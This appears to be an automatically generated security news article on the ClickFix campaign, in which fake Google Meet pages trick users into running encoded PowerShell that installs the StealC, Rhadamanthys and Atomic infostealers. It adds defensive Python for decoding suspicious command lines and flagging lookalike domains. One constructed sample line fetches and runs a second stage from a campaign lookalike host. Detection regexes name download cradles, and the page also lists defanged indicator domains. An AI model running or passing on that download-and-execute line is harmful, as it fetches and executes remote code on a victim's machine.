Today's cybersecurity headlines are brought to you by ThreatPerspective


Ethical Hacking News

New Malware Campaign Utilizes Fake Google Meet Pages to Deliver Infostealers



A malware campaign dubbed ClickFix has been observed using fake Google Meet web pages to deliver infostealers to Windows and macOS users. The pages show a fake error claiming that content cannot be displayed in the browser and instruct the visitor to fix it by copying an encoded PowerShell command and running it themselves; that user-run command, not a downloaded dropper, is what fetches and installs the stealer. Threat actors use a variety of lures to steer victims onto the bogus pages.

  • ClickFix is a social engineering technique rather than an exploit: a fake Google Meet page shows a bogus error and talks the visitor into copying an encoded PowerShell command and executing it themselves.
  • On Windows the chain ends with the StealC and Rhadamanthys stealers; on macOS the visitor is served a booby-trapped disk image that drops the Atomic stealer.
  • Sekoia attributes the Google Meet cluster to two traffers groups, Slavic Nation Empire and Scamquerteo, which use the same ClickFix template and infrastructure.
  • The same period has seen a wave of open-source infostealers, which Hudson Rock warns lowers the barrier to entry and raises the risk for businesses and individuals.



    The threat landscape continues to evolve and expand its reach, with a new malware campaign making headlines recently. The campaign, dubbed ClickFix, leverages fake Google Meet web pages to deliver infostealers targeting Windows and macOS systems. The pages display a fake error message in the browser to deceive users into copying and executing malicious PowerShell code, which infects their systems.

    According to a report shared by French cybersecurity company Sekoia, the threat actors use different lures to redirect users to bogus pages that urge visitors to run an encoded PowerShell command to fix a supposed problem displaying content in the browser. Earlier ClickFix variants have posed as Facebook, Google Chrome, PDFSimpli and reCAPTCHA; this cluster poses as Google Meet, and the domains tied to it also include Zoom lookalikes.

    The attack chain culminates on Windows in the deployment of the StealC and Rhadamanthys stealers, while macOS users are served a booby-trapped disk image file ("Launcher_v1.94.dmg") that drops another stealer known as Atomic. The tactic is notable because it sidesteps controls that key on a downloaded executable: nothing lands on disk for an antivirus engine to scan at the moment of the lure, because the victim pastes and runs the malicious PowerShell command themselves, and the stealer is then fetched from inside that user-initiated session rather than by a payload the page downloads and launches for them.
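    The one artifact such a lure does leave is the command line of the PowerShell process the victim starts. As an added example for this page (not code from the article or from Sekoia), the script below triages that command line as it would appear in process-creation telemetry such as Sysmon Event ID 1 or Security event 4688: it recognises PowerShell's -EncodedCommand switch and its aliases, decodes the Base64-over-UTF-16LE payload, extracts any URLs and scores the usual download-and-execute indicators. The event, the script inside it and the /fix.txt path are constructed for the example; the hostname is one of the lookalike domains listed further down this page.

```python
"""Decode and triage a PowerShell -EncodedCommand line from process-creation
telemetry (Sysmon Event ID 1 / Security 4688 CommandLine field).

Added example for this article; the event, script and URL path are constructed.
"""
import base64
import re
from typing import Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...)
# plus the documented -ec alias, with either '-' or '/' as the switch character.
def is_encoded_switch(token: str) -> bool:
    if len(token) < 2 or token[0] not in "-/":
        return False
    body = token[1:].lower()
    return body == "ec" or "encodedcommand".startswith(body)


def decode_encoded_command(b64: str) -> Optional[str]:
    """The -EncodedCommand argument is Base64 over UTF-16LE text."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


# Indicators looked for in the decoded script (download cradle + execution).
SCRIPT_INDICATORS = {
    "download_cradle": re.compile(
        r"(?i)\b(invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring|"
        r"downloadfile|net\.webclient|start-bitstransfer)\b"),
    "invoke_expression": re.compile(r"(?i)\b(iex|invoke-expression)\b"),
    "nested_base64": re.compile(r"(?i)frombase64string"),
}
# Indicators looked for in the raw command line.
CMDLINE_INDICATORS = {
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "execution_policy_bypass": re.compile(r"(?i)-e(?:p|xecutionpolicy)\s+bypass"),
}
URL_RE = re.compile(r"(?i)https?://[^\s'\"<>()]+")


def triage_command_line(cmdline: str, parent_image: str = "") -> dict:
    """Return what a detection rule would want to know about one process event."""
    result = {"encoded": False, "decoded": None, "indicators": [], "urls": [], "score": 0}
    tokens = cmdline.split()          # Base64 never contains whitespace
    for i in range(len(tokens) - 1):
        if is_encoded_switch(tokens[i]):
            decoded = decode_encoded_command(tokens[i + 1].strip("\"'"))
            if decoded is not None:
                result["encoded"] = True
                result["decoded"] = decoded
                break
    script = result["decoded"] or ""
    for name, rx in SCRIPT_INDICATORS.items():
        if rx.search(script):
            result["indicators"].append(name)
    for name, rx in CMDLINE_INDICATORS.items():
        if rx.search(cmdline):
            result["indicators"].append(name)
    # A Win+R "Run" launch (the usual ClickFix instruction) is parented by
    # explorer.exe; a script host or scheduled task would not be.
    if parent_image.lower().endswith("explorer.exe"):
        result["indicators"].append("launched_from_explorer")
    result["urls"] = URL_RE.findall(script)
    result["score"] = len(result["indicators"]) + int(result["encoded"])
    return result


# Constructed ClickFix-style stage: fetch and run a second stage from one of the
# lookalike hostnames reported for the campaign (the /fix.txt path is invented).
SAMPLE_SCRIPT = ("$u='https://meet.google.com-join.us/fix.txt';"
                 "iex (New-Object Net.WebClient).DownloadString($u)")
SAMPLE_CMDLINE = ("powershell.exe -w hidden -ep bypass -enc "
                  + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii"))


def analyze_sample() -> dict:
    return triage_command_line(SAMPLE_CMDLINE, parent_image=r"C:\Windows\explorer.exe")


if __name__ == "__main__":
    r = analyze_sample()
    print("decoded :", r["decoded"])
    print("urls    :", r["urls"])
    print("hits    :", r["indicators"], "score", r["score"])
```

    The decoded script, not the Base64 blob, is what should feed detection content, since the encoding changes with every byte of the payload while the cradle (a WebClient or Invoke-WebRequest download piped into Invoke-Expression) stays the same across variants.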

    Sekoia attributes the cluster impersonating Google Meet to two traffers groups, Slavic Nation Empire (aka Slavice Nation Land) and Scamquerteo, which are sub-teams of markopolo and CryptoLove respectively. Both use the same ClickFix template impersonating Google Meet, which suggests that they share materials (a so-called 'landing project') as well as infrastructure.

    This, in turn, raises the possibility that both groups are customers of the same, as-yet-unidentified cybercrime service, with a third party managing the infrastructure on their behalf. The discovery comes amid campaigns distributing the open-source ThunderKitty stealer, which overlaps with Skuld and Kematian Stealer, and the appearance of new stealer families named Divulge, DedSec (aka Doenerium), Duck, Vilsa, and Yunit.

    Variations of ClickFix have been reported widely in recent months, with lures posing as Facebook, Google Chrome, PDFSimpli and reCAPTCHA; the Google Meet pages are the newest addition. The hostnames Sekoia tied to the Google Meet clusters, shown defanged and including their Zoom lookalikes, are:
    - meet.googie.com-join[.]us
    - meet.google.com-join[.]us
    - meet.google.web-join[.]com
    - meet.google.webjoining[.]com
    - meet.google.cdm-join[.]us
    - us01web-zoom[.]us
    - us002webzoom[.]us
    - web05-zoom[.]us
    - webroom-zoom[.]us
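    Every address above puts the brand in the hostname but belongs to a different registrable domain (eTLD+1): meet.google.com-join[.]us is a host under com-join.us, not under google.com, and us01web-zoom[.]us imitates the us01web.zoom.us pattern of a real Zoom host. That is a check a defender can run over DNS or proxy logs. The example below is added for this page and is not part of Sekoia's report; it uses a deliberately small public-suffix table, so a real deployment would swap in the full Public Suffix List (for instance via the tldextract package), and the brand patterns are assumptions chosen to cover the listed hosts.

```python
"""Flag hostnames that carry a Google Meet or Zoom brand but belong to a
different registrable domain (eTLD+1).

Added example for this article; the suffix table is a small subset of the
Public Suffix List and the brand patterns are chosen for the hosts below.
"""
import re

# Minimal stand-in for the Public Suffix List: enough for the hosts in this example.
PUBLIC_SUFFIXES = {"com", "us", "net", "org", "co.uk"}

# Brand pattern -> registrable domains that legitimately carry that brand.
BRANDS = {
    "google_meet": (re.compile(r"meet[.-]?goog[il]e|googie"), {"google.com"}),
    "zoom": (re.compile(r"zoom"), {"zoom.us", "zoom.com"}),
}


def refang(host: str) -> str:
    """Turn the report's defanged form (example[.]com) back into a hostname."""
    return host.replace("[.]", ".").strip().lower().rstrip(".")


def registrable_domain(host: str) -> str:
    """eTLD+1 using the suffix table above; the longest matching suffix wins."""
    labels = host.split(".")
    for i in range(1, len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[i - 1:])
    return host


def classify(host: str) -> dict:
    """legitimate: brand present and eTLD+1 is the brand owner's;
    lookalike: brand present under someone else's eTLD+1; no_brand otherwise."""
    h = refang(host)
    rd = registrable_domain(h)
    for brand, (pattern, legit) in BRANDS.items():
        if pattern.search(h):
            verdict = "legitimate" if rd in legit else "lookalike"
            return {"host": h, "brand": brand, "registrable": rd, "verdict": verdict}
    return {"host": h, "brand": None, "registrable": rd, "verdict": "no_brand"}


# The hostnames Sekoia tied to the Google Meet cluster, as listed in the article.
ARTICLE_IOCS = [
    "meet.googie.com-join[.]us", "meet.google.com-join[.]us", "meet.google.web-join[.]com",
    "meet.google.webjoining[.]com", "meet.google.cdm-join[.]us", "us01web-zoom[.]us",
    "us002webzoom[.]us", "web05-zoom[.]us", "webroom-zoom[.]us",
]


def lookalikes(hosts) -> list:
    """Hostnames from `hosts` that imitate a brand they do not belong to."""
    return [c["host"] for c in map(classify, hosts) if c["verdict"] == "lookalike"]


if __name__ == "__main__":
    for c in map(classify, ARTICLE_IOCS + ["meet.google.com", "us02web.zoom.us"]):
        print(f'{c["verdict"]:11} {c["host"]:32} eTLD+1={c["registrable"]}')
```

    The point of reducing to eTLD+1 first is that a naive "contains google" rule either blocks real Google hosts or lets meet.google.web-join[.]com through; comparing the registrable domain against the brand owner's does neither.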

    "The rise of open-source infostealers represents a significant shift in the world of cyber threats," noted cybersecurity company Hudson Rock. "By lowering the barrier of entry and fostering rapid innovation, these tools could fuel a new wave of computer infections, posing challenges for cybersecurity professionals and increasing the overall risk to businesses and individuals."



    Related Information:

  • https://thehackernews.com/2024/10/beware-fake-google-meet-pages-deliver.html

  • https://www.bleepingcomputer.com/news/security/fake-google-meet-conference-errors-push-infostealing-malware/

  • https://www.forbes.com/sites/daveywinder/2024/10/18/hackers-avoid-google-chrome-security-features-in-new-attack-researchers-warn/

  • https://mssplab.github.io/threat-hunting/2023/11/09/malware-analysis-stealc-1.html

  • https://any.run/malware-trends/stealc

  • https://www.malwarebytes.com/blog/threat-intelligence/2024/01/atomic-stealer-rings-in-the-new-year-with-updated-version

  • https://www.bleepingcomputer.com/news/security/atomic-stealer-malware-strikes-macos-via-fake-browser-updates/

  • https://github.com/hackirby/skuld

  • https://www.tomsguide.com/news/this-new-malware-is-taking-over-discord-accounts-and-stealing-browser-data-what-you-need-to-know

  • https://www.cyfirma.com/research/the-will-of-d-a-deep-dive-into-divulge-stealer-dedsec-stealer-and-duck-stealer/

  • https://malwaretips.com/blogs/yunit-trojan-stealer/

  • https://www.pcrisk.com/removal-guides/31232-yunit-stealer

  • https://thehackernews.com/2024/10/sidewinder-apt-strikes-middle-east-and.html

  • https://www.netmaker.io/resources/apt-groups


  • Published: Fri Oct 18 06:48:14 2024 by llama3.2 3B Q4_K_M

    © Ethical Hacking News . All rights reserved.
